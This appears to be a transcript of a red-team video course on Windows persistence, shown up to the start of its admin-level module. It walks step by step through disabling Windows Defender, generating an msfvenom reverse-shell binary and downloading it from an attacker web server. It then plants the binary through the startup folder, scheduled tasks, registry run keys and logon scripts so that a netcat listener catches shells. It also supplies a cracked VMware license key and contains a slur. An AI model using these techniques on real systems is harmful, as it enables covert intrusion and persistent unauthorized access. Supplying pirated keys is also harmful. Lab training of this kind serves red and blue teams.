Welcome to this course titled Advanced Windows Persistent. Here is a little bit about myself. My name is Mo Blessing Matage. In the field I go by the name aka Joker the Cyber Golfer. I have 4 years of self-taught cyber expertise under my belt. I roam the digital domain as an ethical hacker or a red teamer, fueled by undisputed passion. Also a content creator and an instructor. Feel free to get in touch. I am open and I love hearing from students. Course overview. First, we start with setting up a fresh lab from the ground together to avoid hiccups on your journey. Then we move on to low-level persistence tactics, which can be set without special privileges on a system. On low-level techniques, we are going to perform several persisting tactics, which are startup folder, scheduled task, registry run keys, Logon Scripts, and PowerShell Profile. After that, we go to admin level persistent tactics, which can be set with admin level access, or let's say when you are running as high integrity level. Here, we are going to perform elevated scheduled task, multi-action scheduled task, Winlogon registry shell key, Winlogon registry user init key, modified services which gets you access as NT authority system, WMI Event Subscription which also gets you access as NT authority system, and lastly, hidden user with RDP Access, which is just what it says. I feel bad mentioning what we are going to learn in my courses, because I update my courses as soon as I learn another technique. Anyways, it's okay. I'll be also updating my intro learning units. Now let's move on. Lab overview and requirements. To be successful in this course, we just need 2 machines, a Kali Linux machine and a Windows machine. Requirements: you need to at least have 8 gigs of RAM and 60 gigs of storage. Who is this course for? This course is for red teams, ethical hackers, blue teams, and also anyone in cybersecurity has to be aware, because hackers doesn't choose or care you are the blue team or a software engineer. Everyone gets cooked. They just get what they came for. So the ethical hackers are going to level up their skill in their world of compromising systems and persist in target systems, while blue teamers are going to learn how red teams or ethical hackers work and persist in target systems so they can defend better, protect their systems, and educate their fellow workers for better security. It wasn't raining when Noah built the ark. Let's note that. And also, knowledge is power. Equip yourself with so much of it. The difference between secure and vulnerable is as simple as one individual in a company of thousands making one small mistake. Don't be the weakest link or give costs to a company or a business because you are not well educated and an aware cyber person. Level up. Now, without further delay, let's get started into this course. Hey, what's up, bro? Let's have a small time to introduce ourselves to the resource file that carries a link that will lead us to an archive that stores all our resources we are going to use throughout this course. For me, the resource file is on the desktop, but for you, you go ahead and check it in the description of this video. Let's go ahead and open it up. As we can see, I have a TeraBox link right here. Let's go ahead and open it up on our browser. Alright, as we can see, we have a single folder called Advanced Windows Persistent. As we can see, we have 3 folders right here. Alright, so to properly pull down our resources to our system, we need to install the TeraBox client software itself. We can go ahead and create another tab and say download TeraBox. Let's go ahead and click on the first link from terabox.com. and we go ahead and click on free download. For me, I already downloaded it. I'm not going to download it again. For me, it is stored right here. So let's go ahead and install it. UAC prompt, go ahead and click yes. Alright, installation location is just fine for me, and I'll untick this one that says install Chrome extension. I'll go ahead and untick it, and I'll go ahead and click on quick installation. Alright, let's give it a second. It won't take too long. After installing itself, it will go ahead and pop up. So let me pause the video and I'll unpause once it is finished installing. Okay, that was fast. Seems like it did finish. Now it is popping itself in front of us. Let's wait for it. All right, here we are. So this is how we're looking. For me, I'll go ahead and sign in with my email and my password because I already have an account with them. If you don't have an account, you go ahead and click on sign up. So I'm going to pause the video and I'll go ahead and sign in with my credentials. I'll meet you when I am signed in. So I have signed in into TerraBox and it is telling me that a file link shared by a friend has been detected. We can go ahead and click on view, but if yours didn't detect it automatically, we can go ahead and redo this action. We can come back on our browser and we come back right here on the main link. We come back to the main link and we refresh. Alright, we are here. What we can do, we can tick this box and say download. It will go ahead and say TerraBox is whatever, and it says a link shared by a friend has been detected. We can go ahead and click on view. And as we can see, this is our folder with 3 folders inside it. Let's go ahead and click on download. And it is telling me that it will go ahead and download into this location, which is the F drive TerraBox download. For me, it is going to store it right here on this F drive and TerraBox download. This is where it is going to store all the content that it is going to download. So I'll go ahead and click on download. Where's that window? Come on, where are you? Is this one? What is vexing me? This is the one. We go ahead and click download. Alright, now it is going to pull down all of these files. So let's just go ahead and give it a second and we'll see once it is finished. It won't take too long, just like that. Bam, bam, bam. Let's go ahead and give it a second. Alright, my friend. For me, the downloading process has finished. As we can see, I can go ahead and clear all the records. And I'll minimize and I'll come back to my F drive TerraBox download, and as we can see, the advanced Windows persistent folder is right here and with its 3 subfolders. Wonderful. So this is it for this video, my friend. We have put down all the resources we need to be successful in this course. So let's go ahead and meet in the next video, guys. This is it. Bye bye. Welcome to this lab setup and configuration module. In this phase, we are gearing up our digital playground for some serious exploration. Here is the rundown. I'll be spinning up 2 virtual machines, Kali Linux and Windows 11. Our virtualization software of choice is going to be VMware Workstation, a solid pick for its reliability and professional grade features. And hey, I got your back with a VMware Pro lifetime license key, courtesy of yours truly. Once our machines are up and running, we'll give them a good system update to beef up their security and keep them running smoothly, and then we dive into the main event. So let's roll up our sleeves and get this lab off the ground. Stay tuned for the next video. Exciting things lies ahead. So in this video, we are going to download and install the VMware virtualization software and also activate its pro features. So without wasting any time, let's go ahead and open up our browser and say download. VMware Workstation. Let's go ahead and click the first link from vmware.com. Scroll down and click on Try Workstation 17 for Windows. I am using a Windows system. Looks like VMware does have a problem on their side, but for me I already downloaded it, and for you, you should be able to download it. So I'll go ahead and minimize and locate wherever it is stored. For me, it is stored in my downloads programs folder. I'll go ahead and double click on it to install. UAC prompt, go ahead and click yes. So here's the wizard. Let's go ahead and click next. Let's go ahead and accept the terms and license agreement. Let's go ahead and click next again. For me, everything looks fine. I'll go ahead and untick this box that says join the VMware Customer Experience Improvement Program. I'll go ahead and untick that because I don't need it. And next, install. All right, it is going to take 2 minutes or 3 minutes. It depends if you have a hard drive or any SSD. For me, I do have a hard drive, so I'll go ahead and pause the video and I'll unpause once this setup installation has finished. For me, the installation has finished. Let's go ahead and click finish, and now let's go ahead and open up our VMware Pro. All right, so this is how we're looking. Let's go ahead and click on help, and I need to click on about VMware settings, and for me it is saying licensed and the type is volume and it says no expiration. For me, I think it has taken the caged license key and put it right here. That's why it is saying licensed. All right, but if it's for you, you have to go in our resources folder, not right here. You will have to come in the F drive. For me, it is right here, the advanced Windows persistent, and I'll need you to come on tools and get the key right here. You will have to copy it and go straight with it to your VMware right here. I need you to click on help, enter a license key, then you go ahead and paste it. This is what you need to do to activate your VMware Workstation Pro features. Let's go ahead and click OK. UAC prompt, just go ahead and click yes, and as we can see, looks like our key got accepted, and you have to come on about VMware Workstation and you should see this one, licensed, no expiration. This is what you need to see. For me, I think it did go ahead and get the caged credentials, I mean the license key. All right, my friends, so this is it for this video. We have installed our VMware Workstation virtualization software and also activate its pro features. Nice. So this is it for this video, guys. I'll see you in the next one. Bye bye. Sup my friend. So in this video, we are going to download the Kali Linux pre-installed virtual machine and the Windows 11 pre-installed virtual machine. Let's go ahead and open up our browser and say download Kali. Let's go ahead and open up the first link from kali.org. And I need you to click on virtual machines. And for us, we all know we are using VMware. We'll go ahead and download this one. For me, I already downloaded it. I'm not going to download it again. Now let's create another tab and say download Windows 11 VM. Let's go ahead and click the first link from Microsoft.com. We all know we are using VMware. We'll go ahead and download this one, and it is in 23 gigs of size. I already downloaded it. I'm not going to download it again. For me, they are stored in the download compressed folders right here. They were zipped folders, so I extracted them. So this is how they are. If we open up Kali, we can see these are all the files inside that folder. And if we open up this Windows 11 virtual machine, this is what we have. So this is it for this video, my friend. Meet me in the next video where we'll set up these machines on our virtualization software right here. Bye bye. I'll see you in the next video. All right, we are back on back. So in this video, we are going to set up our virtual machines on our virtualization software. So let's go ahead and do so by clicking on open a virtual machine right here. Let's go in our downloads folder, compressed. Let's go ahead and start with the Kali Linux, and let's go ahead and double click on this file. And as we can see, now we do have a Kali Linux system right here. Let's go ahead and do on the second system. Let's come back on the home tab and open a virtual machine. We come back in the downloads compressed folder. We go into this folder which contains the Windows 11 virtual machine. We double click on this file again, and it says name for the new virtual machine. I'll go ahead and name it Windows 11. I'll say tab. And for the storage path for the new virtual machine, I'll go ahead and create a folder in my F drive right here where I have another virtual machines folders right here. I'll go ahead and create a folder and I'll name it Windows 11 dash tab, just like this. Then I'll come back right here and I'll click on browse. I'll allocate in the F drive boxes, VM and Windows 11 tab, and I'll click OK. So this is where my Windows 11 virtual machine is going to be stored. Let's go ahead and click import, and it should take 2 minutes to import this virtual machine into that folder. So I'll go ahead and pause the video and I'll unpause once it is finished importing this Windows 11 virtual machine. The importation of the Windows 11 virtual machine is finished. Now let's go ahead and modify these virtual machine settings. I'll go ahead and start with the Kali Linux right here. I'll go ahead and right click on it and I'll just go ahead and hit rename. I want to name it Ninja, just like that. What's wrong with my left pen? What's wrong with it? Everything is in corner. I don't know why. Let me close it and reopen it. All right, nice, cool. So we do have our Kali Linux and our Windows 11 virtual machine. Now let's go ahead and modify these machine settings. Let's go ahead and start with the Kali Linux. Let's go ahead and click on edit virtual machine settings. On memory right here, I'll go ahead and allocate 4 gigs of RAM because I have 20 gigs of RAM on this system. On processors, I'll go ahead and allocate number of core processor 1 and number of processors, let me say 4. And I'll come right here, the disk is okay, network adapter is okay, and everything seems okay. So I just changed the memory and the processors information right here. Let's go ahead and click OK. I'll go on the Windows 11 virtual machine. Let's go ahead and click on Edit Virtual Machine Settings. I'll go ahead and reduce the RAM to 4 gig and come right here and do the same. It is already configured. The hard disk is okay, 125. It doesn't mean it will go ahead and take 125 gigs of our storage. Nope. Now let's come right here and delete this one. We don't need it. And this one also. And as we can see, we have two network adapters. We have the first one, which is network adapter host only, and we have network adapter number 2. I'll go ahead and remove number 2, and I'll come back on the network adapter right here, and I'll put it on the NAT network adapter right here, and I'll click OK. Wonderful. So the last thing we need to do before we move on, we need to modify some IP addresses right here. You know, you will see what I'm talking about when I am in the process. Let's go ahead and click on Edit, and let's click on Virtual Network Editor. After that, I need you to click on Change Settings right here. It will give you a UAC prompt. Just go ahead and click Yes. All right, here we are. As you can see, we have this network adapter, this one and this one. We have host only, bridged, and NAT network, and their IP addresses for you should see 192 and 172.168 or whatsoever, but for me I already modified them just because I need my IP addresses on my virtual machines to look simple and straightforward, not 192.168.30.1 whatsoever. No, it will be like 10 10 10, and the last number that is going to be automatically assigned by the dynamic host configuration protocol. So this is where I modified. You can just come right here and modify it the way you want, 172 or 192.10.10, and the last IP address number will be set automatically by the DHCP. So this is where I modified. You go ahead and also modify it so it won't annoy you when you are typing IP addresses or whatsoever. It will be easy like that. After that, you go ahead and click Apply and OK. All right, my friends, so this is it. Our two virtual machines are ready to get powered on, so we'll leave it right here. This is it for this video, my friend. Meet me in the next video, then we'll start to get going with the Kali Linux. Bye bye. All right, we are back. So in this video, we'll mainly focus on our Kali Linux. We are going to power it on and log in and do whatever we want to do, like updating the system, creating a new root user or whatsoever. So let's go ahead and power on our Kali Linux system. Alright, looks like the Kali Linux is fully booted up. Let's go ahead and log in with the default credentials, which is Kali, and the password is also Kali. Wonderful, nice. So before we do anything, let's go ahead and open up our terminal and create a root user. It is already created. We are just going to put a password on the root user and go ahead and log in into the root user. Let's go ahead and say sudo su, and we put our password, which is Kali, and now we are logged in as root. Let's go ahead and say pw, not pw, pss passwd. Yeah, that's all. And you go ahead and put your own password you wanna put on your root user. All right, after that, let's go ahead and close this terminal and log out of this system. Now let's go ahead and log in as root with the password we created. All right, wonderful. Now let's go ahead and open up our terminal. And we say apt update. After AP update, we'll go ahead and say apt upgrade. Then we'll let the system update and upgrade its softwares, whatever it is. We'll go ahead and let it do its thing, and after that our system will be ready to get in the main event. So I'll go ahead and say apt update. It is going to download and update some repositories, and later on apt upgrade. That's all to upgrade our system to its latest version and security and whatsoever. Then our Kali Linux will be ready. So that's all what you need to do. So I'm gonna cut this video right here. This is it. This is the end of our Kali Linux video. You go ahead and upgrade your Kali Linux, and that's all, and modify it the way you want. For me, I'll go ahead and modify it the way I want on some preferences or whatsoever. So go ahead and do your thing on your Kali, and after that meet me in the next video. Then we'll meet when we start to tinkering with the Windows 11 virtual machine. This is it for Kali. Get your Kali very much up to date. Bye bye guys, I'll see you in the next video. All right my friend, we are here, we are back again. So in this video we are going to focus on our Windows 11 virtual machine to make it be ready to go for the main events. Let's go ahead and power on this virtual machine. It is going to take 2 minutes to 3 minutes because it is going to configure some users or whatsoever. So let's go ahead and give it a second, and we'll be back once it is finished configuring everything, once it is up and running. Alright my friend, now my Windows 11 virtual machine is fully booted up, and this is how we're looking. Nice. So the first thing I need you to do, this is for my own preferences. If you need to do, you go ahead and do so. I'm going to strip off the features of this Windows 11 virtual machine so it can run a little bit fast. You come on your settings, on the system tab. I need you to scroll down, come on about. I'll click on advanced system settings. Let's click on the performance settings. Let's go ahead and click adjust for best performance. Right here we are stripping off all the features of this Windows 11 virtual machine. This is for my own preferences. You go ahead and follow you if you need to do so. This is me modifying my system the way I want it to be. Nothing more important right here. And lastly, I need you to come on the Windows Update and click check for updates to make sure your machine will be very much up to date the next time we meet. And lastly, the last thing I need to do on this machine, it looks like we have a bunch of unnecessary softwares we will not use. So for me, I'm going to remove all unnecessary softwares which is bloatwaring this system. So what I will do, like this Blender for Visual Studio, or right click and click on uninstall. The calculator, I don't need it. The camera, I don't need it. The clamp up video, the clock, the Corona, I don't need it. Feedback hub, I don't need it. I'll just right click and install. That is bloatwaring. Get help, get started, I don't need them. OneDrive, I don't need it. Paint, Quick Assistant, all of these I'm going to bloatware. And even the Visual Studio 2022, I don't need it. I'll go ahead and bloatware this system. This is for my own preference, so my system can run a little bit fast. If you need to do so, you go ahead and follow along. So this is what you will see next time when you see me. I'm going to modify my virtual machine then the way I want. I'm not going to create any misconfiguration or whatsoever. That's all. So the next time I see you, your machine better be ready and very much up to date right here on the updates. That's all. This is it for this video, my friend. We are done with Windows 11. Until I see you next time. Bye bye. Welcome to this module part of the course. Let's take a moment to discuss what we are diving into. So, what is low-level persistence in Windows? Low-level persistence in Windows refers to techniques or mechanisms used by ethical hackers or threat actors to maintain their presence and access across system reboots or logouts while operating as a low-level user. Achieving persistence as a low-level user is challenging and requires careful consideration of several key factors other than as an administrator who can just turn off the antivirus solutions or create an exclusion on a file or a folder. For instance, the primary enemy as a low-level user is antivirus solutions. Your malicious actions or binaries must evade detection by antivirus and endpoint detection systems and operate under the radar. Alright, let's not delay any further. In this section, we will explore several tactics for achieving persistence as a low-level user. See you in the next video. Hey, what's up, friendo? In this learning unit, we are going to turn off antivirus solution in our Windows 11 target system and create an exclusion folder where our malicious binaries will live. We are doing this because Windows 11 doesn't care if real-time protection is on or off. If it just sees a malicious binary, it just deletes it. That's why we are doing this. After that, then we craft a malicious binary with the help from Metasploit on our Kali Linux that will get us a reverse shell access. Then we transfer it to the target system. That's all. Then we move on to the next learning unit. So let's get into action. Alright, first thing, let's go ahead and turn off the antivirus solution that is available on this Windows 11 system, which is just Windows Defender. Let's go ahead and click right here and open up the Windows Security panel. After that, I need you to click on Virus and Threat Protection. Let's click on Manage Settings and turn everything off. After that, let's scroll down, and as we can see something called exclusions. Let's go ahead and click on Add or Remove Exclusions. Wonderful. Let's go ahead and click Add an exclusion right here. What we can do, let me show you a hidden folder we need to use to put our malicious binaries and whatsoever. I'll come right here. Let's come on the C drive. As you can see, we can't see it right here, which means it's a hidden folder. What we can do, we can click on View and Show Hidden Items. And as we can see, now we can see this folder right here called Program Data. This is where we are going to put our malicious binaries right here. So let's come back right here on our Windows Security Exclusions. Let's go ahead and click right here. Folder. This PC, C drive, program data. Let's click select folder. So everything we'll put in this folder will not get inspected or whatsoever. Even if we run it, it won't get deleted. Everything in this folder won't get touched or inspected or scanned or whatsoever. Alright, wonderful. Now let's go back to our Kali Linux and craft our malicious binary that will give us access into our Windows 11 target system. Let's go ahead and open up our terminal. For me, I like something called Terminator, not the default one. This is the Terminator, and I have added it to the panel right here. I'll go in the in the opt drive right here, and let's go ahead and create another folder. I'll just name it dev. Let's cd into dev folder, and we are here. Let's go ahead and craft our malicious binary. Let's say MSF Venom -p, which is payload Windows /x64 /shell _reverse _tcp. Let's all know that we can also use Meterpreter to use those fancy Meterpreter features or whatsoever, but let's keep it professional and manual. We are going to use shell reverse TCP. After that, let's go ahead and say listening hosts. This is where we are going to put our IP address. Let me create a down pane and confirm it. This is my IP address 10.10.10.128, or we can just say listening host ETH0, which will automatically assign this IP address. After that, let's say listening port for us is going to be 443. Let's put it on port 53. After that, the file format is going to be an executable, and we are going to output it and be named winlogon.executable. Let's go ahead and hit enter to generate the malicious payload. Now the malicious binary has been generated. As you can see, it is right here. Let's go ahead and spin up a simple Python web server, and we'll download the malicious binary on our Windows 11 target system. Let's go ahead and say Python 3-m http.server on port 80. Then we hit enter. Alright, so whoever connects on port 80 will get on this simple IP address, not simple IP address, I mean on this simple Python web server. Let's come back on our Windows 11 device, and let's go in that C program data folder that is excluded from antivirus inspections. Let's come right here, and I need you to right click right here and say open in terminal. Wonderful. What we can do is IWR, which is evoke web request. Then we put these two simple double quotes, say HTTP, our IP address on our curly, and we say winlogon.executable file. Then we output it as winlogon.executable file. Let's go ahead and hit enter. We can come back on our Kali Linux and check someone did come back and grab the winlogon.executable file. Let's come back on our Windows 11, and as you can see, we now have the winlogon binary right here. Alright, what we can do right here on our Kali Linux is set up the simple listener, the simple netcat listener, but I don't want you to just spin up just like this. Nope, I want you to do better with the utility called rl rep. Go ahead and install it. This utility will let you be able to use up and down arrows on your keyboard. You know what I'm saying? If you have typed a command up in your Windows machine, you can just press up and down arrows to move along those commands. That's what rl rep will do. So let's go ahead and install it. It is very much helpful, trust me. Wonderful. Let's go ahead and clear the screen and say rl rep nc, which is netcat dash no DNS verbose listen on port 53. So now we are listening on any connection on port 53. Now let's come back on our Windows 11 target system and double click this winlogon.executable file to receive a shell on our Kali Linux listener. Alright, looks like it did run. Now let's come back to our Kali, and as you can see, now we do have access on the program data folder, which is excluded from antivirus inspections. We did this because this is not a Windows Evasion course. That's why we just created this exclusion folder. If it's a productive system, you have to make sure that your binaries will not get detected. I think you get the picture. Alright, wonderful. So this is it for this video, my friend. Meet me in the next video where we will perform our first persistent technique. Bye bye. I'll see you in the next video. Hey, what's up my friend? I welcome you with so much love to our first Windows persistent technique. Alright, now I need you to go in your resources folder. For me, it is right here in the F drive. Terabox download and advanced Windows persistent, and I need you to open low level persistent folder. And let's go ahead and open up this .txt file, which is called startup folder. Alright, nice. What you can do, you can just go ahead and transfer your advanced Windows persistent folder to your Kali Linux if you want, but for me, let me just go ahead and do it simple like this. Alright, as you can see, technique is called startup folder and needed privileges, regular user or medium integrity, and this technique is just used by everyone. Let's go ahead and say who am I on our session. We can see we are just user on this system. Let's go ahead and say who am I /o. As you can see, I'm just user and I'm running on medium mandatory level, and this is just the privileges I do have. Alright, wonderful. I'll go ahead and clear the screen. Now let's come back on our .txt file, and we do have this command up here. It says what are startup programs here. Let's go ahead and copy it and paste it on the terminal to run it. As you can see, we have security health, and this is the command or the path to the binary. And we also have VMware user process, and this is the path to the binary and an argument. We can go ahead and confirm it right here on our Windows target system. Let's go ahead and search for task manager. Where are you? Let's go ahead and do the search task. Let's come right here, and as you can see, startup apps, and it says VM tools is enabled, and this is the one, I think so, VMware user process. And we have security health tray enabled, and I believe this is security health, this is the one. And everything that says disabled won't show up right here if we query all the startup application with this command. Wonderful. Let's go ahead and clear the screen and come back to our .txt file. Alright, it says copy your binary to a startup folder. Now leave your listener on. Whenever the target reboots and sign in, you get your shell. Alright, so let's go ahead and copy this command and paste it right here. As you can see, our command just go ahead and copy the winlogon.executable binary from our program data folder. Then it stores it in the start menu program startup folder. Let's just go ahead and hit enter. And as we can see, one file or files copied. And if we just go inside this folder, like cd, paste the path, and you say dir, we can see we have our winlogon.executable binary right here. Let's come back to our Windows 11 device, and as you can see, our binary also exists right here, and the status, it says enabled. So which means each and every time this user shuts down their system and sign in back again, we'll just go ahead and have access, because it will go ahead and run our binary, and if our listener is up and running, we'll catch a reverse shell. It would be nice if our binary had an icon that would be less suspicious, but it's okay for educational purposes only. Wonderful. Let's come back to our Kali Linux. We can cancel the access we do have and run the RL netcat listener on port 53 again. Come back to our Windows 11 target. Let's go ahead and sign out. Other persistence requires you to just sign out and sign in. Others requires the user to fully reboot the system. Let's keep that in mind. Now let's go ahead and sign in as just user. Before we click sign in, let's come back right here. Our listener is up and ready. Now let's go ahead and click sign in. Let's go ahead and give it a second. If your mouse is stuck in this Windows system, you can press Ctrl Alt and you can come back right here on your listener. We do not have nothing yet. Let's come back right here. Okay, it's loading. Let's give it a second. We won't pause the video because we need to see this thing in action. Okay, this is what we have. Let's come back right here. Nothing yet. Okay, it's okay. Let's wait a bit. All right, let's come back again. And as we can see, we do have access. If we say who am I, we are just user. Say who am I/o, we are just user running on medium mandatory level. Alright, you can go ahead and try to restart your machine or whatsoever. You just go ahead and get your access. Wonderful. So this is how you persist using the startup folder. Alright, now let's come back to our .txt file, and this is saying delete the binary from the startup programs. Note that sometimes you have to kill your binary process from the system for you to actually delete it, because it says access denied. This is a thing to note. Let's just go ahead and try to delete our binary. Obviously it won't, because it is the one that is holding this session. As you can see, access denied. We can just go ahead and cancel access, rerun our netcat listener. We need to clear up properly. We copy the command, take it straight to our Windows 11 system, and open up a terminal. We need to properly clear what we did, because next time we practice, we don't want to receive a shell from another persistent technique or whatsoever. So after any technique, you go ahead and clean up. So let's go ahead and paste the command we copied and hit enter. And as you can see, because it doesn't exist or whatsoever, let me try to cd inside this folder. Maybe it got deleted or whatsoever, I don't know. Okay, this folder doesn't exist. What's going on? Don't fool me, nigga. Let me open up the task manager. If we don't see our binary on the task manager, it will mean that our binary was removed. That's why it says because it doesn't exist. Let's go ahead and check. As you can see, our binary is still there. Let's just go ahead and right click on it and open file location. And our binary do still exist right here. Let's just go ahead and delete manually to clean up what we did. Okay, nice. And as we can see on the task manager, it did go ahead and disappear. Wonderful. Alright, my friends, so this is it for this video. Let's meet in the next one. Let's just go ahead and have a shell again on our Kali Linux system. Our netcat listener is up and running. Let's go ahead and run our binary. We do have a shell. Wonderful. Alright, my friends, so bye bye. This is our first technique. Hope to see you in the next video. I'll be waiting for you. Welcome back to the second technique of low level user persistent. Let's go ahead and open up our resources folder. In the low level persistent folder, I need you to open the second technique, which is called scheduled task. Let's go ahead and open it up. Minimize, and I'll minimize this one. Let's go ahead and open it up again. It says technique is scheduled task, needed privileges, regular user or medium integrity, and used by everyone. Alright, wonderful. It says right here, these commands above runs or checks available tasks. Let's go ahead and run them. As we can see, there are a lot of information right here, and if we click Control-C to cancel, will also kill our access. So let's just go ahead and leave it running. Damn, this is a lot. Is this system on loop or what's up? Alright, it did finish. Let's go ahead and run the second command to check available tasks. Before I do so, I'll clear the screen and I'll run the command. And as you can see, it's not running because I am not in the PowerShell session. Let's go ahead and say PowerShell -ep bypass. Clear the screen, run the command. I think this command won't run properly or whatsoever, but it's okay. Let's just go ahead and leave it. Let's come back on our scheduled task. As you can see, this command right here says runs daily at 9 a.m. Let's just go ahead and copy this command. As you can see, it will go ahead and create a task which is called my task/go, and it should run daily at 9 o'clock a.m. and it should run this binary right here, which is our malicious binary. For us, we'll go ahead and change the time from 9 o'clock to something recent. Let's just come right here, and as you can see, it says 12:53. Let's just go ahead and set 12:55, and we'll go ahead and wait for it. 55. Then we hit enter, and it says the scheduled task, my task /go has successfully created. We can create a right pane right here and say RL rep. We create another listener, which is NVNLP53. Okay, I don't know why it did not run. I forgot the NC. Just like this. Wonderful. So let's just go ahead and wait for 12:55 to happen right here, and hopefully it should run our binary. I hope I haven't missed it anyway, because it says 12 a.m. and right here it says 12 p.m. or whatsoever. Let's just give it a second and see. $12:55. Now let's come back on our Kali, and as you can see, we do have a shell right here. Our binary was executed successfully. As you can see, it's just user. Wonderful. Let's come back right here. It says, is it there? We can just go ahead and confirm. Before waiting for it to run, we can just go ahead and confirm, was it set successfully? And as you can see, it was set successfully, and for now it is saying running because we already have an access right here. It says logon mode interactive only, whatsoever task to run, which is our binary. Okay, wonderful. And it says daily at 12:55 p.m. start date, which was today, and day is every 1 day. Okay, wonderful. We can run it manually by running this command. You can go ahead and run it, and this is removing it. We can go ahead and remove this task. Before we do so, let's cancel it, cancel the session we do have, and we paste the command and delete the task. As you can see, it was successfully deleted. We can use the up arrow to check if it is still there, and as you can see, the system cannot find the specified file. They find the path specified. Wonderful, the task has been gone. Nice. All right, my friends, so this is it for this video. Meet me in the next video where we will demonstrate another persistent technique. Bye bye, I'll be waiting for you. Welcome back, my friend. Let's go ahead and perform the third technique, which is Registry Run Keys. Let's go ahead and open it up. Alright, the technique Registry Run Keys, needed privileges, regular user, or medium integrity. This technique is used by everyone. Alright, this command above right here is adding our binary. Let's go ahead and copy it up. Come back with it right here. And it says the operation completed successfully. We just add our binary right here. This is the path to our binary. Let's come back right here. And let's go ahead and confirm, is it there? Okay, as we see, it is there. Wonderful. And now it says, now leave your listener. Whenever the targets reboot and sign in, you get your shell. Let's go ahead and do so. I'll go ahead and cancel this session, clear the screen, run the netcat listener. We come back to the Windows 11 target system. We sign out. Our listener is up and running. Let's go ahead and sign in. If you can't move your mouse out, you can hit Control Out. Nothing yet. Let's give it a second. Let's go ahead and check our listener. Nothing yet. Let's go ahead and check it up. As we can see, we do have a shell. Let's go ahead and say, who am I? We're just user on this system, and we are running as medium integrity level or medium mandatory level or whatsoever. All right, my friends, so this is the third technique. Wonderful. Let's go ahead and move on. Let's not wait any longer. Let's just go ahead and clean up what we done. This is removing the operation completed successfully. Let's go ahead and query, is it gone? As you can see, nothing has returned back, which means we have cleared it up. Let's go ahead and clear the screen, and this is it for this video, my friend. Meet me in the next video where we will demonstrate another technique. Bye bye. I'll be seeing you there. No time to waste. Let's keep moving to the fourth technique, which is Logon Scripts. Let's go ahead and open it up. As you can see, the technique Logon Scripts needed privileges, regular user or medium integrity, and it is used by a PT28 group, Cobalt group, and Zebrosi groups. Let's go ahead and check for available Logon Scripts by running this command on our target system. As you can see, this is Logon Scripts that is available on this system. Let's go ahead and create a .bat file. It says down here, creating a script that will call our binary when the user logs in. Let's go ahead and copy this command. As you can see, it is saying echo at echo f and redirect this output right here to a file in the C drive program data, which is our excluded folder, and create a logon.bat file. Let's go ahead and hit enter. And as you can see, it did run without any error. Let's just go ahead and in that folder say dir. We can see we have logon.bat. If we need to see its content, we can say type, and as you can see, it says at echo off. Now let's go ahead and move on. As you can see, it will go ahead and put this information inside that logon.bat file, which is the path to our malicious binary, and it is going to append it in the logon.bat file. Let's hit enter and say type again, and so we can see the logon.bat file says at echo off and the path to our binary. Wonderful. Let's come back right here, and it says adding the Logon script bat to the registry. Let's go ahead and copy the command, clear the screen, follow everything carefully, nothing will confuse you. Let's go ahead and hit enter. It says the operation completed successfully. Now it says confirm is it there, and always leave your handler on. Whenever the target reboots or login, you always get your shell. Let's go ahead and do so. We can cancel the access we do have and run another netcat listener. Now let's come back to our Windows target system and sign out and sign in again. Control out to get your mouse back, and boom, we do have the shell so fast. Let's go ahead and say who am I. We're just user running at medium integrity level as always. Wonderful. Okay, so deleting the key we added to the registry and confirming is it removed. Let's just go ahead and copy the command to delete the registry key we added, and then we confirm is it gone. It says the operation completed successfully. Let's go ahead and check is it gone. Yes, it is not on the list now right here. If we run this command when we have putted our logon.bat file, we could have seen it right here, but we didn't. All right, it's okay. All right, my friends, so this is the fourth technique. Let's go ahead and move on to the fifth technique. I'll be seeing you there. Bye bye. We are doing just fine. Let's keep on moving. Now we are on PowerShell Profile. Let's go ahead and open it up. As you can see, the technique PowerShell Profile needed privileges, regular user, or medium integrity, and it is used by Tula APT group. Down here it says this one abuses PowerShell Profile, so it can't work on every Windows system. It's abusing a specific misconfiguration, not misconfiguration, but configuration. I'm sorry about that. It works if a machine has a Windows PowerShell folder. For example, the home path documents Windows PowerShell folder. Alright, it says dir home path documents Windows folder. If it exists, we should write our script in this folder. If it doesn't exist, let's not waste time. Obviously, it won't work. So let's go ahead and run this command to check, does this folder exist on this system? And for us, it doesn't exist. You can go ahead and try to run this command on your system and see if this folder does exist. Let me go ahead and try to run on my host system. I want to check if this folder does exist. I bet it doesn't. Come on, CMD, where are you? Okay, bad boy. As you can see, it doesn't exist. Oh, it just exists the documents folder, not the Windows PowerShell folder. Okay, file not found, it doesn't exist. All right, cool. Let's not waste any time setting up anything because it won't work. So down here it says echo C drive program Winlogon, which is our malicious binary, or append this location of our binary inside the PowerShell, which is profile.ps1 script. It says giving profile.ps1 script a location to our malicious binary. We keep listening now. Now, every time our victim opens a PowerShell or his process launches a PowerShell, or on starting up the machine, process launch a PowerShell, then we get our shell, and this is removing what we added. Okay, so this folder, if it exists on your system you are working on, or the system you did set up, you go ahead and try this technique. If it doesn't, don't waste your time. It's just good to have all the techniques under your belt. All right, my friends, so this is it for this video. Bye bye. I'll see you in the next one. Welcome to this module part of the course. Let's take a moment to discuss what we are diving into. So, what exactly is admin level persistence in Windows? Admin level persistence in Windows refers to techniques or methods employed by ethical hackers or threat actors to maintain their presence or access across system reboots or logouts while operating as an administrator user. Being an administrator user on a system opens up more ways to persist because we can interact with many components of the system and less worrying about antivirus solutions or EDRs, because we can just set exclusions, disable security, or anything we want, less worrying about making our binaries undetected. So here's an important factor to keep in mind. Setting up your persistent as an admin user doesn't mean you get access with admin privileges or with high privileges. Let's keep that in mind. So in this module, we are going to perform tactics that get you access as low-level user, others get you access with high privileges user, others get you access with anti-authority privileges, which is all access on the system. So keep that in mind. So without any further delay, I'll be seeing you in the next video. Interesting things lies ahead. Bye bye. Sup my friend. In this video we need to establish a shell as an administrator back to our Kali Linux. Let's go ahead and open up our Kali. Let's open up our terminal. We need to spin up a netcat listener. I'll cd into opt dev folder, Then I'll go ahead and run rl repnet cat to listen on port 53. Let's come back on our Windows 11. Let's go ahead and right click on Winlogon, run as administrator. Click yes on the UAC prompt. Let's come back to our Kali, and as we can see, we do have a shell. Let's go ahead and say who am I. We are just user, but if we say who am I /o, we are just user but running as high mandatory level, which means our session is elevated, and this is all the privileges we do have now. Wonderful. So this is it for this video, my friend. Go ahead and meet me in the next video where we'll start to perform our first technique of persisting as an administrator on any system. Bye bye. I'll be seeing you there. Welcome to our first persistent tactic as an administrator on this target system. Alright, now let's go ahead and open up our resources folder. I need you to navigate to admin level persistent folder. Let's go ahead and open the scheduled task.txt file. Alright, it said the technique is scheduled task and needed privileges admin or high integrity 